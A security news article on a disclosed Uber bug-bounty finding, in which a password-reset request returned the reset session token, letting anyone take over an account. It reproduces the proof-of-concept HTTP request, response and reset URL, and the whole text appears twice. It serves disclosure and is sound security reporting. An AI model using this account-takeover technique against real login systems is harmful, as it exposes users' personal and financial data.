An Italian security expert Vincenzo C., who is popular on Twitter as @Procode701, has discovered a critical Authentication vulnerability in UBER by which anyone can reset the password for any account.
The company held the Bug Bounty program which was operated by Hackerone where the researcher found the ‘Improper Authentication’ vulnerability.
A summary published by the UBER explains, “With an email address for a valid Uber account, it was possible to take over that account because the reset token was exposed in the response of a password reset HTTP request. This meant an attacker could initiate password reset for an account and immediately receive the reset token for that account.”
“We consider the security of our user’s data top priority, so we were very interested in this report. Furthermore, @procode701 was a pleasure to work with and we look forward to more reports in the future.”
The security expert found out that the vulnerability in the reset password could be exploited to generate an authentication token “inAuthSessionID”, and then anyone could use this to change the password for any account.
Here is the UBER Improper Authentication flaw
To change the password for any account you just need to obtain a session token “inAuthSessionID” and then using the standard link that is present in the change password form you can easily change the password.
https://auth.uber.com/login/stage/PASTE SESSION ID <— inAuthSessionID generated through the chaneg password email /af9b9d0c-bb98-41de-876c-4cb911c79bd1 <– tokenID with no expiration date.
POST /login/handleanswer HTTP/1.1
Host: auth.uber.com
{ "init": false,
"answer": {
"type": "PASSWORD_RESET_WITH_EMAIL",
"userIdentifier": {
"email": "xxxx@uber.com"
}
}
}
Reply
HTTP/1.1 200 OK
{
"inAuthSessionID": "cdc1a741-0a8b-4356-8995-8388ab4bbf28",
"stage": {
"question": {
"signinToken": "",
"type": "VERIFY_PASSWORD_RESET",
"tripChallenges": []
},
"alternatives": []
}
}
The impact of this vulnerability is very severe, it allow a hackers to access any account and any user’s data (i.e. ID Card, banking data, Driver License), including financial one.
The company held the Bug Bounty program which was operated by Hackerone where the researcher found the ‘Improper Authentication’ vulnerability.
A summary published by the UBER explains, “With an email address for a valid Uber account, it was possible to take over that account because the reset token was exposed in the response of a password reset HTTP request. This meant an attacker could initiate password reset for an account and immediately receive the reset token for that account.”
“We consider the security of our user’s data top priority, so we were very interested in this report. Furthermore, @procode701 was a pleasure to work with and we look forward to more reports in the future.”
The security expert found out that the vulnerability in the reset password could be exploited to generate an authentication token “inAuthSessionID”, and then anyone could use this to change the password for any account.
Here is the UBER Improper Authentication flaw
To change the password for any account you just need to obtain a session token “inAuthSessionID” and then using the standard link that is present in the change password form you can easily change the password.
https://auth.uber.com/login/stage/PASTE SESSION ID <— inAuthSessionID generated through the chaneg password email /af9b9d0c-bb98-41de-876c-4cb911c79bd1 <– tokenID with no expiration date.
POST /login/handleanswer HTTP/1.1
Host: auth.uber.com
{ "init": false,
"answer": {
"type": "PASSWORD_RESET_WITH_EMAIL",
"userIdentifier": {
"email": "xxxx@uber.com"
}
}
}
Reply
HTTP/1.1 200 OK
{
"inAuthSessionID": "cdc1a741-0a8b-4356-8995-8388ab4bbf28",
"stage": {
"question": {
"signinToken": "",
"type": "VERIFY_PASSWORD_RESET",
"tripChallenges": []
},
"alternatives": []
}
}
The impact of this vulnerability is very severe, it allow a hackers to access any account and any user’s data (i.e. ID Card, banking data, Driver License), including financial one.